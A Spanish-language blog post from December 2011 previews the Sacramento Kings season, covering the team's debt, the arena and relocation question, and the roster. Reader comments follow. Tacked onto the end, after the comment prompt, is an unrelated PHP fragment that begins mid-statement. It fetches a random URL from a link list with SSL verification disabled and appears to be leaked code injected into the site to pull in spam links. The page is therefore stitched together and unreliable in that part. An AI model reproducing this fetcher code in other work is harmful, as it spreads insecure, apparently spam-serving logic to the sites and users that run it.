Sacramento Kings: A despedirse dignamente

19 de December de 2011 por Sancho88

La crisis aprieta y este puede ser el último año de existencia de un equipo histórico como los Kings. O por lo menos, su última campaña en la capital californiana de Sacramento antes de mudarse al sur estatal, rumbo a Anaheim. La trayectoria del club puede definirse como itinerante. Fueron los Royals de Rochester en 1945 y más tarde viajaron por Cincinnati y Kansas City-Omaha hasta asentarse definitivamente en Sacramento en 1985. Un único título les avala, el que consiguieron en 1951. Su historia reciente está marcada por aquella final de conferencia contra L.A. en 2002, la que muchos consideraron como el mayor robo de la historia del deporte. Dick Bavetta sabe algo de aquello.

Los hermanos Maloof consiguieron salvar al equipo sobre la bocina la pasada temporada, pues la compra por parte del dirigente de NHL, Henri Samueli, dueño de los Ducks de Anaheim, se truncó en el último minuto. Incluso, en el registro de los equipos aparecían ya los Anaheim Royals para la presente temporada. Muchos pensaron que el último partido iba a ser contra Los Lakers precisamente, en el rebautizado Power Balance Pavillion (el Arco Arena de siempre con distinto nombre). Era el destino. Terminar contra el gran rival. El 13 de abril los ‘paletos’ habían preparado todo el parapeto. Incluso, el final tenía toda la lógica del mundo: Kobe Bryant remontando en el último minuto para quitarles el caramelo, como siempre. Pero una especie de milagro desbloqueó todo aquello.

El 3 de mayo David Stern confirmó que Sacramento Kings seguía un año más. No obstante, lejos de ser un cheque en blanco, aquella noticia era solo un espejismo. ¿Por qué? Porque la NBA les pide tener un pabellón nuevo.
A principios de abril, el club vendió los derechos del pabellón Arco Arena al consorcio Power Balance, que en la actualidad está en quiebra. Pero no es suficiente. Si no encuentran un aval pronto o alguien se hace cargo de la construcción de ese pabellón –tienen de plazo hasta marzo– no les quedará más remedio que mudarse. Esa es la gran barrera de difícil superación para los Kings: la liquidez. Los Maloof no encuentran inversión en el entorno de la ciudad y el equipo tampoco levanta pasiones en lo deportivo. Esta conjunción ofrece un panorama poco halagüeño y la sensación de estar viviendo lo que otras ciudades históricas de baloncesto como Vancouver o Seattle ya vivieron en el pasado.

Al parecer, la salida hacia Anaheim no acaba de convencer a los tres equipos que operan en el mercado radial del sur de California, véase: Clippers y Lakers en Los Ángeles, y Warriors en la cercana bahía de Oakland, San Francisco. Éstos reclaman que un cuarto equipo en tan poco territorio desestabilizaría el equilibrio comercial de cada franquicia.

Sin embargo, los Kings necesitan dinero para continuar y difícilmente renunciarán al patrocinio por parte del dueño de los Ducks, o de quien sea. Han sobrevivido a una posible reducción de franquicias post lockout –tema que finalmente no se puso sobre la mesa de negociación, pero sobre el que debatieron los expertos en la liga–, pero apenas pueden soportar la carga salarial de pagar en nómina el 85% del tope salarial que exige el nuevo convenio, que supondría cerca de 44 millones de dólares. De hecho, son el equipo que menos dinero paga en salarios junto a los Hornets (tienen comprometidos unos 40 millones actualmente) y podrían ser uno de los grandes beneficiados del nuevo impuesto de lujo, que grava entre un 50% y un 300% –en casos muy flagrantes– a los equipos que se excedan del límite salarial con respecto al anterior convenio. Por eso, el reparto del fondo de compensación les beneficiaría, hasta cierto punto. Es innegable que económicamente el club está al borde del colapso, y unos cuantos millones de dólares no solucionarían prácticamente nada. La situación real es la siguiente: los hermanos Maloof asumieron en 1999 una deuda de 77 millones de dólares que no para de crecer, y su franquicia de hoteles y casinos en Las Vegas corre serio peligro. Incluso, hace dos temporadas tuvieron que ‘desarmar’ su proyecto WNBA, las Sacramento Monarchs. De momento, Bob Cook, propietario minoritario del equipo, está en la ruina y va a tener que desprenderse de su parte del pastel. Aunque los Maloof han desmentido que este problema les afecte a ellos, lo cierto es que es difícil que puedan asumir más cargas fiscales por la deuda acumulada. Otro empresario californiano, Ronald Burkle (figura en el puesto 400 de la lista Forbes), dueño de cadenas de alimentación, una empresa petrolera y parte muy importante del lobby demócrata de apoyo a Hilary Clinton –se calcula su fortuna en 3,2 billones de dólares– también ha sonado como posible comprador del equipo. Sea quien sea, la viabilidad en Sacramento parece imposible, después de todos estos datos. Con la salida de Sacramento en mente, ahora toca analizar cómo será la previsiblemente última temporada de los Kings.

En el apartado deportivo, el equipo se debate en una continua regeneración, que año tras año les convierte en favoritos para la lotería de los rookies. Lejos queda ya la época dorada de principios de 2000, con jugadores como Webber, Divac, Stojakovic o Jason Williams, y desde entonces el equipo ha ido perdiendo uno a uno a todos sus eslabones: Mike Bibby, Gerald Wallace, Ron Artest y Brad Miller. La última vez que llegaron a playoff fue en 2006 para caer en primera ronda contra San Antonio Spurs por 4-2.

Desde 2006 encadenan récords negativos año tras año, apenas superando las 20 victorias en liga regular. Con una temporada reducida de 66 partidos, veremos si son capaces si quiera de alcanzar esa cifra de las 20 victorias. Para ello, deben confiar en su buque insignia: Tyreke Evans, y en su salud, siempre dudosa debido a problemas graves de fascitis plantar. Paul Westphal debe equilibrar un banquillo joven que apenas llega a los 25 años de media. La marcha de Samuel Dalembert, agente libre que cobraba 13 millones, ha obligado a los Kings a hacerse con un par de contratos altos para compensar ese desequilibrio salarial, como son el de Chuck Hayes y John Salmons. Juntos cobrarán algo más de la ficha de Dalembert. John Salmons 8,5 millones por temporada y Hayes algo más de 5 millones, pues ha firmado como excepción de nivel medio. Pueden aportar defensa interior, en el caso de Chuck, y ráfagas de anotación irregular, en el caso de John, que por cierto vuelve a casa tras su discreto periplo por Milwaukee. Unos que vienen y otros que se van, en este caso Beno Udrih, quien fue intercambiado por el propio Salmons y una segunda ronda de draft en la noche del draft. Además de estos intercambios, los Kings podrían estar interesados en varios agentes libres como Nick Young y Andrei Kirilenko, según el diario local Sacramento Bee, para alcanzar ese 85% del límite salarial.

De todas formas, en la actualidad el equipo presenta un desajuste en la dirección. Cuentan con Evans e Isaiah Thomas (nada que ver con el Bad Boy). Ambos pueden anotar, pero no son bases directores. Tyreke confía a menudo en su tiro exterior, que no es malo pero tampoco es su mejor arma, debido a restricciones por parte de diferentes entrenadores en su época universitaria. Isiah Thomas es una incógnita mayúscula a este respecto. Gran anotador en los Huskies de Washington, su juego y su físico se asemejan mucho al de Nate Robinson. No parece ser el perfil de director que necesita Sacramento. Podría hacer un papel parecido al que hacía Pooh Jeter la pasada temporada: revolucionar los partidos, pero poco más. Por tanto, es evidente que un base agente libre que pueda firmar por el club californiano les vendría de perlas. Como tercer base del equipo aparece el también rookie Adrian Oliver, otro anotador compulsivo que se ha pasado el ‘lockout’ jugando en el Aris griego.

Precisamente, incógnita también será el juego exterior. La renovación de Marcus Thornton debe asegurar un buen caudal de puntos por partido, pero resulta que Sacramento drafteó a un jugador de ese perfil, Jimmer Fredette, y se hizo también con el ya citado John Salmons, por lo que el concurso de egos está asegurado. En teoría, Thornton parte por delante de ellos, pero la necesidad real de un nuevo ídolo blanco nacido en EE.UU en la liga –disculpen la comparación Larry Bird y John Stockton– puede darle toda la responsabilidad a Fredette. Kevin Durant ya lo ha bautizado como “el mejor anotador del mundo”, pero en Rucker Park también se prodigan grandes muñecas y eso no es ninguna garantía para triunfar en la NBA. Por tanto, el reto de Jimmer será desbancar a otros ídolos encumbrados antes de tiempo como Wally Szczerbiak, Kyle Korver o J.J. Redick. Su juego es comparable al de Jaycee Carroll. Ambos son mormones, con una técnica de tiro exquisita, buena lectura del juego ofensivo y capacidad para generarse sus propios tiros. Los dos anotaron más de 2.500 puntos en la NCAA, pero no superan el metro noventa, lo cual es un gran hándicap en la liga.

En la posición de alero el equipo sigue contando con el veterano Francisco García, sólido como pocos en defensa, con buena mano en el tiro exterior, pero con un historial de lesiones considerables; y han drafteado a Tyler Honeycutt, un jugador del estilo de García, con un físico privilegiado (pura fibra), aunque quizá demasiado ‘Betty Spaghetti’. Vamos, que necesita comerse unos buenos platos de esos que no come ahora Eddy Curry. Proviene de la universidad de UCLA y en principio aparece como uno de los ‘tapados’ del equipo. Fue segunda ronda del draft y destaca por sus largos brazos, su espectacularidad en los mates y por la defensa, que falta le hace al equipo.

En la pintura parece que es donde más garantías ofrece el equipo, de momento. La llegada del ala-pívot JJ Hickson desde Cleveland a cambio del alero Omri Casspi, le ofrece a Sacramento un equilibrio en la pintura. Tras la marcha de Lebron James, la pasada temporada asumió prácticamente toda la responsabilidad de guiar a los Cavs. Puede anotar fácilmente y destaca en el aspecto reboteador (14-8 la pasada campaña). Demarcus Cousins consigue un buen socio y dos jugadores como Hayes o Jason Thompson parecen buenos recambios para asegurar la decencia defensiva (Hayes sobre todo) y el talento y la brega en la pintura (Thompson). Sin embargo, adolecen de un ‘perro grande’. Demarcus es lo más parecido, pero no es un siete pies, y el ‘sophomore’ Hassan Whiteside apenas cuenta con la confianza del entrenador.

Pero que nadie se lleve a engaños. El equipo tiene talento pero le falta un líder, un jugador franquicia que les guíe a playoffs. De momento, Evans no lo ha logrado en sus dos años en la liga, ni se ha acercado. El equipo es perdedor por concepción y Westphal tampoco aporta soluciones desde el banquillo. Habrá que ver cómo se adaptan Fredette, Honeycutt y el resto de rookies (cinco en total), para saber si Sacramento puede montar una franquicia competitiva, aunque sea a partir del año que viene en Anaheim.

Quinteto: Evans, Thorton, García, JJ Hickson, Cousins.
6º hombre: Fredette/Thompson.

Altas: JJ Hickson (Cavaliers), Chuck Hayes (Rockets), John Salmons (Bucks), Jimmer Fredette (R-Brigham Young) Tyler Honeycutt (R-UCLA), Isiah Thomas (R-Washington Huskies), Lawrence Hill (FA-Texas Legends), Adrian Oliver (FA-Aris Tesalónica).
Bajas: Omri Casspi (Cavaliers), Pooh Jeter (FIATC Joventut), Samuel Dalembert (FA), Marquis Daniels (Boston Celtics), Beno Udrih (Milwaukee Bucks), Darnell Jackson (FA), Jermaine Taylor (FA).

Previsión: Fuera de Playoffs (20-46).

Comenta

28 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Gran analisis tanto en lo económico como en lo deportivo. La gran atracción será ver como funciona Fredette en el equipo tras su gran periplo universitario. Yo creo que lo tendrá difícil. Parecen un equipo peleón pero con muy pocas opciones de playoffs. Buena adquisición la de Hickson para un juego interior interesante si Cousins asienta su cerebro y explota sus grandes condiciones. Si la salud de Tyreke le respeta darán algo más de guerra.

      Citar

  2. TheDeerHunter dice:
    #2

    Mucho me temo que este curso va a pasar muy a menudo que entre que se escriben y se publican los análisis los acontecimientos nos dejen un poco en fuera de juego si no estamos totalmente atentos.
    Tenemos el caso de Chuck Hayes, con el que difícilmente se va a poder contar algún día. A perro flaco, todo son pulgas.
    Por lo demás bastante de acuerdo con el análisis… con una curiosidad: en el primer partido de pretemporada la liaron de forma bastante interesante: El perímetro titular fue Fredette, Thornton y Tyreke. ¡Viva el rock&roll!!

      Citar

  3. infante dice:
    #3

    gran analisis, sancho
    no sabia el problema tan grande que tenian los kings, y realmente, pintan bastos para ellos en estos años

      Citar

  4. Ru dice:
    #4

    Gran análisis.Desconocía los problemas económicos de la franquicia,quizás porque los focos se alejan de equipos que luchan por no ser los últimos cada temporada,pero es un panorama bastante desolador.

    La verdad es que se está posponiendo porque falta lo que falta,pero es inevitable que la liga reduzca el número de equipos….

    En lo deportivo muchísimas ganas de ver a Fredette,por lo demás supongo que Cousins progresará un poco más pero su cabeza le seguirá jugando malas pasadas y que la franquicia vaya peor o mejor dependerá de Evans.

      Citar

  5. melo15 dice:
    #5

    Sobre si evans es o no un jugador franquicia, me parece que te equivocas porque yo si creo que se acerco mucho en la temporada rookie, 20-6-6 me parece que ha habido un par que han promediado esos numeros MJ23 y un tal lebron james, puede que evans no sea ahora un jugador franquicia pero podria serlo en 2 años. Coincido contigo en que han de hacer algo con tantos escoltas y bases, yo venderia a fredette que es un defensor pesimo por un base distribuido y un alero

      Citar

  6. portu dice:
    #6

    Gran análisis!
    A mi me parece q aquella idea de hace un par de años de usar a T. Evans como base ha pasado ya a mejor vida, creo q tiene cuerpo de 2 o incluso de 3, y si quieren aprovechar a dos máquinas de anotar como Freddette y Thornton, lo de usar a los 3 en el mismo quinteto no parece ninguna barbaridad… tendrán problemas en defensa y tb ocasionarán muchos problemas a sus rivales. El equipo es demasiado joven, será blandito en defensa, les falta tb peso dentro de la zona, aunque Cousins puede seguir mejorando, así q tb de acuerdo con las previsiones de Sancho en cuanto a victorias y candidatura a un gran pick el año q viene en el draft.

      Citar

  7. rumbero dice:
    #7

    Yo soy poco objetivo con los Kings (siempre he tenido debilidad por ellos) pero me parece un equipo más que interesante. Si bien es cierto que para que esta misma temporada sean un equipo a tener en cuenta se tienen que dar toda una serie de requisitos. A Evans hay que verlo sano y al 100% fisicamente para valorarlo como líder (no hay que olvidar su primer año). Thornton-Salmons-Freddete deben garantizar una gran cantidad de puntos desde fuera. A ver como se adapta éste último, pero en el primer partido de pretemporada ya ha demostrado de lo que es capaz. Cousins debe seguir con la progresión y confirmar las buenas impresiones de su primer año, y con Hickson debería formar una buena dupla interior. Para mi les falta un buen 3 y que chuten a Westphal

      Citar

  8. Sancho88 dice:
    #8

    portu:
    Gran análisis!
    A mi me parece q aquella idea de hace un par de años de usar a T. Evans como base ha pasado ya a mejor vida, creo q tiene cuerpo de 2 o incluso de 3, y si quieren aprovechar a dos máquinas de anotar como Freddette y Thornton, lo de usar a los 3 en el mismo quinteto no parece ninguna barbaridad… tendrán problemas en defensa y tb ocasionarán muchos problemas a sus rivales. El equipo es demasiado joven, será blandito en defensa, les falta tb peso dentro de la zona, aunque Cousins puede seguir mejorando, así q tb de acuerdo con las previsiones de Sancho en cuanto a victorias y candidatura a un gran pick el año q viene en el draft.

    Claro, ese es el tema. Ofensivamente los muchachos no tienen problema alguno en pasar de los 100, pero raro es el envite que no les meten +110… las muñecas de Tyreke, Salmons, Thornton y Fredette están fuera de toda duda, pero también está fuera de toda duda que los bases y pívots rivales les cascan +25 puntos todos los días. Partidos entretenidos los que juegan, en definitiva, pero con esa sensación, ese tufillo desde el primer momento de que van a palmar…

    @Melo, lo del tema Evans jugador franquicia. Sus números de rookie efectivamente son los que comentas, y tenía toda la pinta de progresar, pero el año pasado dio ya un pequeño bajón, y este año… veremos. El otro día jugó tocado otra vez de la fascitis, y ese va a ser un problema me parece para el resto de su carrera deportiva. Es algo crónico que con los partidos va a peor. Un estilo Brandon Roy, aunque espero que se lo curen de alguna manera…

    Lo que comentáis de Hayes. Cuando hice el análisis no se había publicado, pero hice varias modificaciones y en una de ellas sí que lo puse como nota aclaratoria, lo que pasa es que mi bandeja de correo va como el culo y supongo que no le llegaría bien a Txusma. Y con respecto al gravísimo problema económico, en los últimos días los Maloof han sido optimistas porque van a negociar con el ayuntamiento crear un aparacamiento en la zona del nuevo pabellón que quieren construir por un importe de 200 millones, que el ayuntamiento les construye tirando de chequera y ellos explotan, pero lo que saquen se lo devuelven (calculan ganar unos 50 millones). A cambio el ayuntamiento les hace el pabellón y se lo irían pagando a cómodos plazos.

    Pero sí, a mí la mejor opción para que la liga siga siendo viable me parece la reducción de equipos.
    Muchas gracias a todos porque os ha gustado el análisis!!

      Citar

  9. Sancho88 dice:
    #9

    @Deer. Tienes toda la razón en que la bruma no nos deja ver la claridad. Como a cada hora que pasa suceden nuevas noticias… no solo falta en el análisis lo de Hayes, que esperemos que se lo puedan tratar sin operar aunque tenga que retirarse, como le ocurrió a Cuttino Mobley, sino el contrato que le han ofrecido al ‘amnistiado’ Outlaw, que puede ser el alero que les falta a los Kings. Si fuera el que todos conocimos en Portland… igual la cosa cambiaba. Veremos.

      Citar

  10. melo15 dice:
    #10

    Que es este problema de fascitis

      Citar

  11. Sancho88 dice:
    #11

    pues una inflamación de la fascia plantar, de los pies. le pasó a pau hace unos años en memphis y estuvo unos meses de baja, pero cuando se vuelve crónica da guerra cada poco. y es lo que le pasa a Evans.

      Citar

  12. RSB dice:
    #12

    Sacramento conforme está y su general manager haciendo un movimiento desastroso previo al draft. Primero que no entiendo el cambio Udrih por Salmons si tenían ya pensado de antemano escoger a Fredette. Con Thorton, el rookie y el propio Evans pudiendo jugar de escoltas, los minutillos que te aportara Udrih de base, sin ser gran cosa me parecían más coherente. Y encima por bajar tres puestos en su ronda, perdieron la oportunidad de hacerse con Brandon Knight (claro que nadie podía esperar que acabara tan bajo) y ahora se enfrentan a los problemas que comentáis. Y para rematar la faena, enferma Hayes… Equipo interesante y panorama bien negro

      Citar

  13. HisRoyalAirness dice:
    #13

    Caray Sancho, vaya análisis más completo, enhorabuena; los datos sobre la situación de la franquicia y su historia buenísimos.

    Con respecto al equipo, la fascitis plantar se cura con reposo así que el lockout ha debido venirle bien a Tyreke. Creo que, junto a él, el que más futuro tiene es Cousins; tiene un talento individual increíble y creo que va a ser un interior de referencia para la próxima década.
    Con respecto a Jimmer, es una metralleta, una barbaridad. Ya el otro día dio muestras de lo que puede hacer desde la larga distancia. En la NCAA era un escándalo aunque es evidente que su altura (y su falta de actitud en defensa) pueden pasarle factura.

      Citar

  14. Jose Luis dice:
    #14

    Ya han echado a Westphal, a ver quién viene a los Kings ahora. No sé qué tipo de entrenador es mejor, y de los que hay libres… ¿Mike Woodson sigue queriendo entrenar?

      Citar

  15. Sancho88 dice:
    #15

    Bueno, a mí no me alegra que le hayan echado, pero sinceramente, no tiene ni idea. No tiene nivel para llevar al equipo. Evans-Thornton no pueden jugar juntos, y alguien le debería decir a Thornton que él no es Dios, que puede meter 30 puntos como muchos en esta liga: Stephen Jackson, Monta Ellis, Jamal Crawford. etc. pero el equipo no necesita que todas las noches los meta. Con su actitud, olvida que tiene compañeros y crea una mala química dentro de la cancha que está haciendo mucho daño al equipo, incluso más que la cabecita de Cousins. Yo supongo que el tema Cousins se ha resuelto como se resuelven en muchas ocasiones este tipo de cosas: echando al entrenador. Todos sabíamos que Westphal y Cousins no se pueden ni ver. En este caso, mal los dos, uno por su inaptitud y otro por su actitud. Esperemos que ahora se vea al Cousins que puede ser, y que Thornton asuma su rol como anotador. Por otra parte, yo pensaba que Udrih no le iba bien al equipo. Me equivocaba mucho mucho. Le están echando de menos muchísimo. Evans es el único base del equipo, y además no hay sistemas. El equipo está muerto en ataque. Y el año pasado Udrih sí hacía jugar a sus compañeros. No sé, Fredette se piensa que solo por su mecánica de tiro se puede sobrevivir en la liga. Está equivocado. Luego, no se sabe quién es el alero del equipo: es Outlaw, es Greene?? es García?? no hay nada claro ahí.

    Para empezar, deberían cambiar el quinteto. Thornton fuera ya. Evans-Salmons-Outlaw-Hickson-Cousins. Con estos a muerte. Y luego Thornton saliendo desde el banco, con los humos calmados, de base. Él debería ser el segundo base, no Fredette. Es vergonzoso ver a ese chaval llevando al equipo. Luego Greene y García pueden rotarse con Outlaw, los tres son aprovechables ahí, y en la pintura pensaba que iba a haber más calidad, pero Thompson está totalmente desmoralizado, no me creo el bajón que ha pegado esta termporada, y Hayes sirve como recambio, pero algo tendrán que hacer para suplirle en las jugadas ofensivas. Me parece que es el peor interior ofensivo de la liga.

    Muy mala pinta tiene el equipo. Creo que son el peor equipo del oeste… Si llegan a las 20 victorias, sería todo un éxito en vista de su potencial

      Citar

  16. Sancho88 dice:
    #16

    Puntualizao con lo del rol de anotador de Thornton. Quiero decir que asuma que puede tirar, que tiene buena mano, pero que baje su status de Michael Jordan a Marcus Thornton, nada más. En Nueva Orleans sí asumía ese rol, y allí demostró que puede ser muy beneficioso para su equipo. Aquí se piensa que es Dios, y no es así

      Citar

  17. melo15 dice:
    #17

    Lo que ha de hacer los king es dejar a evans el equipo, que es el unico que ha demostrado que puede llegar a ser una estrella

      Citar

  18. Sancho88 dice:
    #18

    Se va confirmando que lo único que le pasa a este chaval es que tiene 20 años.

    http://www.solobasket.com/contenidos/demarcus/cousins/kings/yo/nunca/hice/nada/pero/soy/peor/persona/mundo/c-28748.html

    Esperemos que su evolución como jugador y como persona le lleven a centrarse exclusivamente en el baloncesto, y a prestar menos atención a lo que se dice de él, rumores, etc.

    Yo creo que el principal problema de todo esto es que se está sacando chavales muy jóvenes de institutos y universidades y obligándoles a ser hombres de pelo en pecho cuando anteriormente (y que no se me enfaden los defensores de la NCAA) eran solo muchachos jóvenes jugando a divertirse.

    Lo más destacable del artículo es la sinceridad de Cousins acerca de Westphal. Estaba claro que no aportaba ninguna solución al juego del equipo, y de hecho, Sacramento lideraba siempre el ranking de jugadas 1×1. Ningún equipo en toda la liga tiraba más de sus individualidades, y eso deja a las claras el pobre nivel de estrategia. Así lo único que sucede es que renuncias al rebote ofensivo, teniendo a Cousins ahí que es una máquina y a Hickson que también los puede luchar; y que conviertes cada ataque en una lucha de egos a ver quién se la enchufa, con Thornton poniendo morritos de niño cabreado (en serio, nunca había visto una tez relajada con más expresión de cabreo que la de este chico), Evans probando su muñeca del 20 por cien en triples, etc.

    A ver si Smarth pone orden en el patio de recreo, ya que excepto García, Salmons y Hayes, el resto son chavalines con mucho futuro, pero que necesitan disciplina

      Citar

  19. melo15 dice:
    #19

    pero Evans es un jugadorazo no?

      Citar

  20. Sancho88 dice:
    #20

    Evans es un jodido crack. Y creo que estamos por fin de acuerdo tu y yo en esta cosa, xd.

      Citar

  21. melo15 dice:
    #21

    Y Cousins, tambien no??

      Citar

  22. Sancho88 dice:
    #22

    Si…. melo. el problema de estos dos es que el resto del equipo no está a la altura, pero bueno, si los maloof no hacen nada, terminarán sus contratos rookies y se les rifarán las mejores franquicias, no creo que tan jóvenes y con proyección decidan quedarse en un equipo perdedor

      Citar

  23. melo15 dice:
    #23

    Pero no tiene tan mal equipo??
    Thorton, si se deja de tonterias es un anotador super capaz, Garcia no es malo, Outlaw no se como, esa pero era un buen anotador y despues tiene a Thopson y Hickson que son buenillos

      Citar

  24. Sancho88 dice:
    #24

    Según ESPN, la reunión que mantuvieron hace unos días entre Stern y Kevin Johnson, alcalde de Sacramento y ex jugador de los Suns, ha acercado posturas entre la liga y el equipo para mantenerse en Sacramento. Les amplía el plazo hasta el 6 de marzo para presentar el plan económico del nuevo pabellón, el Sacramento Arena, y ahora toca pedirles la pasta a los Maloof. Stern quiere que se impliquen personalmente, es decir, que pongan bastante pasta de sus bolsillos para demostrar que siguen comprometidos al 100% con el equipo. Si no, Stern podría dar un ultimatum a la franquicia para que haya un cambio entre los accionistas y le vendan el equipo a Ronald Burkle, de quien hablo en el análisis, que es un millonetis que ya ha tentado varias veces a los Maloof para que le vendan la franquicia. El pabellón podría costar un total de 400 millones, y los Kings pondrían 120-125 millones, otros 200 kilos, aproximadamente, los aportaría una compañía de leasing, por explotar la zona del parking del estadio, 65 la empresa AEG que concursó por la licencia, y el resto sería a través de publicidad del pabellón y otros extras.
    Al contrario que en otras noticias, creo que esta puede interpretarse positivamente, sobre todo si se implica el nuevo accionista. Creo que los Maloof, que no están muy sobrados con el equipo, deberían cederle el 50% o así a este hombre, porque ellos no han conseguido sanear al equipo en casi 15 años, y un nuevo pabellón no resolvería este problema de rentabilidad. Sí lo haría, a mi juicio, un ricachón como Burkle. Si los Maloof se emponzoñan en su actitud, ojalá que dejen entrar al señor este por el bien del equipo, ya que de no ser así, seguramente Stenr anularía la licencia NBA al equipo. Veremos qué pasa

      Citar

  25. Sancho88 dice:
    #25

    La construcción del pabellón debería estar lista en 2014, y hasta entonces seguirían jugando en el Arco. Ya digo, el único problema aparentemente, es la implicación del equipo, que en este caso son los Maloof directamente. Ellos quieren repartirse al 50% de la parte que no van a poner los de la empresa de leasing, con AEG, y Stern les pide mayor esfuerzo económico a ellos. Honestamente, que dejen el club en manos de alquien que no especule, o que pongan lo que diga Stern. Bastante salvada de culo les hizo el año pasado Johnson, que los Royals de Anaheim ya figuraban entre los equipos inscritos para esta temporada, y todo. Defraudar al alcalde, en este caso, sería muy grave, Que pongan la pasta o se piren y le dejen las llaves del equipo a Burkle

      Citar

  26. Sancho88 dice:
    #26

    Corrijo lo de AEG. Creo que sería la empresa que daría nombre al estadio, no la constructora como tal

      Citar

  27. melo15 dice:
    #27

    Bueno es bueno saberlo.
    Lo he estado pensando, y los Kings han de fichar a Jonny Flynn, aver si recupera su confianza, y vuelve a jugar como el sabe.

      Citar

  28. Vader dice:
    #28

    Bueno parece que al final hay acuerdo para construir el nuevo pavellón. Me alegro mucho porque me caen bien los Kings y porque creo que por aquí hay más de un seguidor…

    Mucha suerte!!! A ver si tira adelante el proyecto!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>